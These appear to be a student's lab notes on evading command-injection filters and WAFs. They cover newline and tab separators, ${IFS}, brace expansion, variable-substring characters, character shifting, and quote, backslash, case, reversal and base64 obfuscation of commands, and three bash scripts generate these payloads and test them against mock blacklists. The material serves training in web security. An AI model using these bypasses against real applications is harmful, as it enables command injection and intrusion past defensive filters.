🦹♂️Filter Evasion
One injection mitigation is a back-end blacklist of characters and words: every request is checked against the list, and any request that contains a blacklisted item is rejected.
Filter/WAF Detection
Let's take a hardened version of our host checker with some mitigations added ->
This could be the back-end code that checks for those characters:
Bypass Blacklisted Spaces
We see that the newline character (%0a) does not get our request blocked:
But with whoami appended, and the space URL-encoded, the request is still blocked:
So let's drop whoami and check whether the space is the character being blocked:
It's good to know that using tabs (%09) instead of spaces is a technique that may work, since both Linux and Windows accept commands with tabs between arguments, so let's try 127.0.0.1%0a%09
Another technique is the Linux $IFS (Internal Field Separator) environment variable. Its default value is a space, a tab and a newline, any of which works between command arguments. So if we write ${IFS}
where the spaces should be, the shell expands it and splits the words as if a space were there, and our command should work: 127.0.0.1%0a${IFS}
There are many other methods we can utilize to bypass space filters; one is Bash brace expansion, which inserts the spaces for us: {ls,-la} is expanded by Bash to ls -la.
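As an added example (not part of the original notes), the following bash script emulates what the filtered host checker does, a constructed blacklist that rejects a literal space, followed by appending the input to a fixed command and handing it to a shell, and pushes each space-bypass payload through it. The filter function, the payloads and the use of `true` in place of `ping` are all assumptions made for this example.

```shell
#!/usr/bin/env bash
# Added example, not from the original notes. Emulates a host checker that
# blacklists the space character and then runs "ping -c 1 <input>" via a shell.
# Assumptions: 'true' stands in for ping so nothing touches the network;
# the filter and the payloads below are constructed for this example.
[ -n "$BASH_VERSION" ] || exec bash "$0" "$@"   # the bypasses are bash-specific

# Constructed blacklist: reject any input that contains a literal 0x20 byte.
# Tab (0x09), newline (0x0a), ${IFS} and braces are not on the list.
filter_blocks_space() {
    case "$1" in
        *' '*) return 0 ;;   # blocked
        *)     return 1 ;;   # allowed through
    esac
}

# What the server does after the filter: concatenate the (already URL-decoded)
# input onto a fixed command and execute it with a shell.
run_as_server() {
    bash -c "true $1" 2>&1
}

# Run one payload through filter and server; print "BLOCKED" or the output.
try_payload() {
    local payload="$1"
    if filter_blocks_space "$payload"; then
        printf 'BLOCKED'
        return 0
    fi
    run_as_server "$payload" | tr -d '\n'
}

# Payloads as the server sees them after URL decoding:
# %0a -> newline (the injection operator), %09 -> tab.
payload_space=$'\n'"echo space-fails"     # blocked: contains a real space
payload_tab=$'\n'"echo"$'\t'"tab-ok"      # tab between command and argument
payload_ifs=$'\n'"echo\${IFS}ifs-ok"      # ${IFS} expands to whitespace, then word-splits
payload_brace=$'\n'"{echo,brace-ok}"      # brace expansion inserts the space itself

# Stand-alone run: show what the server returns for each payload.
for p in "$payload_space" "$payload_tab" "$payload_ifs" "$payload_brace"; do
    printf '%q -> %s\n' "$p" "$(try_payload "$p")"
done
```

The newline in front of every payload is the %0a that the earlier requests already showed to be unfiltered; only the separator between `echo` and its argument changes from one payload to the next.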
Use what you learned in this section to execute the command 'ls -la'. What is the size of the 'index.php' file?
Bypass Blacklisted Characters
Linux
${IFS} is a handy environment variable, but there is no equivalent for the other interesting characters, so let's get creative and use the variables we know to get our characters through the filters ->
So if we print our
And we can't forget $HOME or $PWD, which also begin with a /
Windows
we can echo a Windows variable (%HOMEPATH% -> \Users\htb-student), then specify a starting position (~6 -> \htb-student), and finally specify a negative end position, which in this case is the length of the username htb-student (-11 -> \). Put together in cmd syntax, %HOMEPATH:~6,-11% yields a single backslash.
Character Shifting
This is a nice technique to produce the required characters without typing them:
all we have to do is find the character in the ASCII table that comes just before the one we need and shift it by one (for example, [ comes right before \).
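As an added example (not part of the original notes), this bash script rewrites a command so that a constructed blacklist of space and / never sees those bytes, using ${PWD:0:1} for the slash and ${IFS} for the spaces, and separately shows the character-shifting trick with tr. The blacklist, the obfuscate function and the test command are assumptions for this example; the caveat in the comments about expansion results being data rather than syntax is one a practitioner should keep in mind.

```shell
#!/usr/bin/env bash
# Added example, not from the original notes. Shows how to supply blacklisted
# characters to a command without ever sending them, using variable
# substrings, ${IFS} and ASCII character shifting.
# Assumptions: the blacklist below is constructed for this example, and the
# shell is bash (substring expansion and here-strings are bashisms).
[ -n "$BASH_VERSION" ] || exec bash "$0" "$@"

# Constructed blacklist: space and slash are rejected.
has_bad_chars() {
    LC_ALL=C grep -q '[ /]' <<< "$1"
}

# Character shifting: tr maps every printable character to the next one in
# the ASCII table ('!'..'}' onto '"'..'~'), so '[' (0x5b) becomes '\' (0x5c)
# and ':' (0x3a) becomes ';' (0x3b).
shift_char() {
    tr '!-}' '"-~' <<< "$1"
}

# Rewrite a command so that none of the blacklisted bytes appear in it.
#   '/' -> ${PWD:0:1}   ($PWD, like $PATH and $HOME, always begins with /)
#   ' ' -> ${IFS}       (done last so no space introduced earlier survives)
# Note: a character produced by expansion or substitution is data, not
# syntax. It works inside an argument (a path, a pattern), but a ';' built
# this way will not separate commands; the separator still has to be an
# unfiltered operator such as the %0a newline used in the requests above.
obfuscate() {
    local cmd="$1"
    local slash='${PWD:0:1}'
    local ifs='${IFS}'
    cmd="${cmd//\//$slash}"
    cmd="${cmd// /$ifs}"
    printf '%s' "$cmd"
}

# Execute the obfuscated form the way the injected shell would.
run_obfuscated() {
    bash -c "$(obfuscate "$1")"
}

# Stand-alone run.
cmd='ls -d /etc'
printf 'original   : %s (blocked: %s)\n' "$cmd" "$(has_bad_chars "$cmd" && echo yes || echo no)"
printf 'obfuscated : %s\n' "$(obfuscate "$cmd")"
printf 'output     : %s\n' "$(run_obfuscated "$cmd")"
printf 'shifted    : [ -> %s, : -> %s\n' "$(shift_char '[')" "$(shift_char ':')"
```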
Use what you learned in this section to find name of the user in the '/home' folder. What user did you find?
Bypassing Blacklisted Commands
A command blacklist usually consists of a set of words; if we can obfuscate our commands so that they look different, we may be able to bypass the filters.
Here is the code for a basic command blacklist:
This code looks for an exact match of the provided command, so if we send a slightly different command, it may not get blocked.
Linux & Windows
It's good to know that single quotes ' and double quotes " are usually ignored by command shells like Bash or PowerShell, so w'h'o'am'i executes the same command as if the quotes were not there. The important things to remember are that we cannot mix the two types of quotes and that the number of quotes must be even.
Linux Only
Characters that Bash ignores in this position include the backslash \ and the positional-parameter character $@ (which expands to nothing when no arguments were passed). This works exactly as it did with the quotes, but in this case the number of characters does not have to be even: w\ho\am\i and who$@ami both run whoami.
Windows Only
The caret (^) can be injected into a command word the same way: who^ami runs whoami in CMD.
Use what you learned in this section find the content of flag.txt in the home folder of the user you previously found.
Advanced Command Obfuscation
When dealing with Web Application Firewalls (WAFs), the basic evasion techniques may not be enough and we need more advanced obfuscation.
We can try inverting the character case of a command (e.g. WHOAMI) or alternating between cases (e.g. WhOaMi). This usually works because a command blacklist may not check for different case variations of a single word.
On a Windows server this is enough on its own, since PowerShell and CMD are case-insensitive.
On Linux, however, Bash is case-sensitive, so the mixed-case word also has to be converted back to lowercase before the shell executes it. So we can try
So if we try it in Burp:
It does not work because the command itself still contains spaces (which Burp encodes as +), and those are caught by the space filter, so they have to be replaced as well.
We can try the following command as well
Reversed Commands
Another fun way of playing around with WAFs is to reverse the commands, so the blacklisted word never appears in the request and the shell reverses it back before executing it.
So we can create an environment variable:
The same can be applied on Windows
Encoded Commands
We can utilize various encoding tools, like base64 (for b64 encoding) or xxd (for hex encoding), so that the request carries only the encoded string and the shell decodes it at runtime.
We use the same technique on Windows as well.
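As an added example (not part of the original notes) covering both the "Bypassing Blacklisted Commands" and "Advanced Command Obfuscation" sections, the bash script below generates each Linux obfuscation of a command word (quotes, backslashes, $@, mixed case, reversal, base64) for an arbitrary word, checks every form against a constructed case-sensitive word blacklist, and runs it to confirm the shell still executes the original command. The blacklist, the function names and the choice of `whoami` as the test word are assumptions for this example; it also assumes bash 4 or newer and the rev and base64 utilities.

```shell
#!/usr/bin/env bash
# Added example, not from the original notes. Generates the command-word
# obfuscations from the sections above for an arbitrary word, checks each
# against a constructed substring blacklist, and runs it to confirm the
# shell still executes the intended command.
# Assumptions: bash 4+, and the rev and base64 utilities are installed.
[ -n "$BASH_VERSION" ] || exec bash "$0" "$@"

# Constructed blacklist: case-sensitive substring match on each word, the
# way a naive preg_match() per word would behave.
blocked_words=(whoami cat ls)
is_blocked() {
    local w
    for w in "${blocked_words[@]}"; do
        case "$1" in *"$w"*) return 0 ;; esac
    done
    return 1
}

# "w""h""o"... : every character in its own pair of double quotes (even count,
# one type of quote); bash strips the quotes and joins the pieces.
obf_quotes() {
    local w="$1" i out=''
    for ((i = 0; i < ${#w}; i++)); do out+="\"${w:i:1}\""; done
    printf '%s' "$out"
}

# \w\h\o\a\m\i : a backslash before an ordinary character is simply dropped.
obf_backslash() {
    local w="$1" i out=''
    for ((i = 0; i < ${#w}; i++)); do out+="\\${w:i:1}"; done
    printf '%s' "$out"
}

# w$@h$@o... : $@ expands to nothing when the shell has no positional params.
obf_at() {
    local w="$1" i out=''
    for ((i = 0; i < ${#w}; i++)); do out+="${w:i:1}\$@"; done
    printf '%s' "${out%\$@}"
}

# WhOaMi wrapped in a substitution that lowercases it again before execution
# (Bash is case-sensitive). Note this form contains spaces; against a space
# filter they would need ${IFS} or %09 as in the earlier section.
obf_case() {
    local w="$1" i c mixed=''
    for ((i = 0; i < ${#w}; i++)); do
        c="${w:i:1}"
        if ((i % 2)); then mixed+="${c,,}"; else mixed+="${c^^}"; fi
    done
    printf '$(a=%s;printf %%s "${a,,}")' "$mixed"
}

# $(rev<<<'imaohw') : the request carries only the reversed word.
obf_rev() {
    printf "\$(rev<<<'%s')" "$(rev <<< "$1")"
}

# bash<<<$(base64 -d<<<...) : the request carries only the base64 blob.
obf_b64() {
    printf 'bash<<<$(base64 -d<<<%s)' "$(printf '%s' "$1" | base64 | tr -d '\n')"
}

# Run an obfuscated payload the way the injected shell would; return its output.
run_payload() {
    bash -c "$1"
}

# Stand-alone run over the word 'whoami'.
for fn in obf_quotes obf_backslash obf_at obf_case obf_rev obf_b64; do
    p="$("$fn" whoami)"
    printf '%-14s %-40s blocked=%s output=%s\n' "$fn" "$p" \
        "$(is_blocked "$p" && echo yes || echo no)" "$(run_payload "$p")"
done
```

Each generator takes the word as an argument, so the same script can be pointed at whatever command the target's blacklist happens to contain; the run loop is the check that the obfuscated form is both accepted by the filter and still executed as the original command.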
Find the output of the following command using one of the techniques you learned in this section: find /usr/share/ | grep root | grep mysql | tail -n 1
But for some reason it does not execute my command
I forgot the %09